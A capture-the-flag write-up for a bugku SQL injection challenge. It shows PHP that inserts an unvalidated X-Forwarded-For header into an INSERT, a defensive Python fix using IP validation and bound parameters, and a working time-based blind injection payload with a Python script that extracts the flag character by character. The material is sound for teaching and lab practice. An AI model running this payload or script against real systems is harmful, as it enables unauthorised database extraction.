bugku "insert into" injection

Challenge source code:


Flag format: flag{xxxxxxxxxxxx}
Hint: why not write a Python script for it?

<?php
error_reporting(0);

// Takes the first entry of X-Forwarded-For (fully client-controlled) when the
// header is present, otherwise REMOTE_ADDR.
function getIp(){
    $ip = '';
    if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){
        $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
    }else{
        $ip = $_SERVER['REMOTE_ADDR'];
    }
    $ip_arr = explode(',', $ip);
    return $ip_arr[0];
}

$host="localhost";
$user="";
$pass="";
$db="";

$connect = mysql_connect($host, $user, $pass) or die("Unable to connect");
mysql_select_db($db) or die("Unable to select database");

$ip = getIp();
echo 'your ip is :'.$ip;
// The header value is concatenated straight into the statement: this is the
// injection point. Nothing from the query is echoed back to the client.
$sql="insert into client_ip (ip) values ('$ip')";
mysql_query($sql);
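The two defects in the source above are that the X-Forwarded-For value is trusted as-is and that it is spliced into the SQL string. The following is an added example, not part of the challenge or this write-up, showing the corresponding fix in Python: the first X-Forwarded-For entry is validated as an IP literal (anything else falls back to REMOTE_ADDR, which the server sets rather than the client), and the insert uses a bound parameter. An in-memory SQLite table stands in for the MySQL `client_ip` table, and the function names and the sample header values are my own; the payload string is the shape used later in the write-up, reused here only as a rejected input.

```python
import ipaddress
import sqlite3

# Constructed test input: the time-based payload shape from the write-up,
# fixed to position 1 / character 'f'. Used here only to show it is rejected.
XFF_PAYLOAD = ("127.0.0.1'+(select case when substr((select flag from flag) "
               "from 1 for 1)='f' then sleep(5) else 0 end))#")


def client_ip_from_headers(headers, remote_addr):
    """Return the client IP to record.

    Mirrors the PHP getIp(): prefer the first X-Forwarded-For entry, else
    REMOTE_ADDR. Unlike the original, the header value must parse as an IP
    literal; otherwise the header is ignored and REMOTE_ADDR is used.
    """
    raw = headers.get("X-Forwarded-For")
    if raw:
        first = raw.split(",")[0].strip()
        try:
            return str(ipaddress.ip_address(first))
        except ValueError:
            pass  # not an IP literal: ignore the header entirely
    return str(ipaddress.ip_address(remote_addr))


def open_db():
    # Assumption: an in-memory SQLite table stands in for the MySQL table.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE client_ip (ip TEXT)")
    return conn


def record_client_ip(conn, ip):
    # Bound parameter: the value travels as data and is never part of the
    # statement text, so quotes, '#' and sub-selects inside it are inert.
    conn.execute("INSERT INTO client_ip (ip) VALUES (?)", (ip,))
    conn.commit()


def stored_ips(conn):
    return [row[0] for row in conn.execute("SELECT ip FROM client_ip ORDER BY rowid")]


def demo():
    conn = open_db()
    # 1. Ordinary proxy chain: the first hop is recorded.
    ip1 = client_ip_from_headers({"X-Forwarded-For": "203.0.113.9, 10.0.0.1"}, "10.0.0.1")
    record_client_ip(conn, ip1)
    # 2. Payload in the header: validation rejects it, REMOTE_ADDR is recorded.
    ip2 = client_ip_from_headers({"X-Forwarded-For": XFF_PAYLOAD}, "198.51.100.7")
    record_client_ip(conn, ip2)
    # 3. Even if the raw payload were stored, the bound parameter keeps it an
    #    opaque string: no sub-select runs, the table just holds the text.
    record_client_ip(conn, XFF_PAYLOAD)
    return stored_ips(conn)


if __name__ == "__main__":
    for ip in demo():
        print(repr(ip))
```

Validation and parameterisation are independent layers: the first keeps junk out of the table and removes the "sleep or not" signal entirely, the second guarantees that whatever string does reach the database cannot change the statement. Either alone would have stopped this particular challenge; together they also cover the case where a later developer decides to store the full header.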


The X-Forwarded-For value only lands in an INSERT and nothing is echoed back, so a time-based blind injection is needed. Commas are filtered, which rules out IF(), so CASE is used instead:

select case when xxx then xxx else xxx end; 


POC payload (sent as the X-Forwarded-For value):

"127.0.0.1'+(select case when substr((select flag from flag) from {0} for 1)='{1}' then sleep(5) else 0 end))#"

({0} and {1} mark the loop positions, which are filled in with format(). "substr(... from {0} for 1)" is the comma-free form of substr().)


import requests
import sys

# python3.6
url = 'http://123.206.87.240:8002/web15/'
sql = "127.0.0.1'+(select case when substr((select flag from flag) from {0} for 1)='{1}' then sleep(5) else 0 end))#"
flag = ''
# strtest = "TEST{0}+{1}"

# Outer loop: flag position; inner loop: candidate character code.
for i in range(1, 40):
    for ch in range(32, 129):
        if ch == 128:
            # No character matched at this position: the flag is complete.
            sys.exit(0)
        xff = sql.format(i, chr(ch))
        # print(xff)
        headers = {'X-Forwarded-For': xff}
        print('这是第' + str(i) + '轮,' + str(ch) + '次进行猜测')
        try:
            resp = requests.get(url, headers=headers, timeout=3)
        except requests.exceptions.Timeout:
            # sleep(5) exceeded the 3 s timeout, so the guess was correct.
            flag += chr(ch)
            print('flag:' + flag)
            break

# Note: the flag comes out in uppercase letters; the real flag is lowercase.
# (The string comparison is case-insensitive under MySQL's default _ci
# collations, and the loop reaches uppercase codes before lowercase ones.)
# Note: with a poor network connection the latency was too high; running it
# from a VM gave completely wrong results, switching to the host machine worked.


Reference: https://blog.csdn.net/xuchen16/article/details/82904488


posted @ 2019-09-06 19:31 Zhu013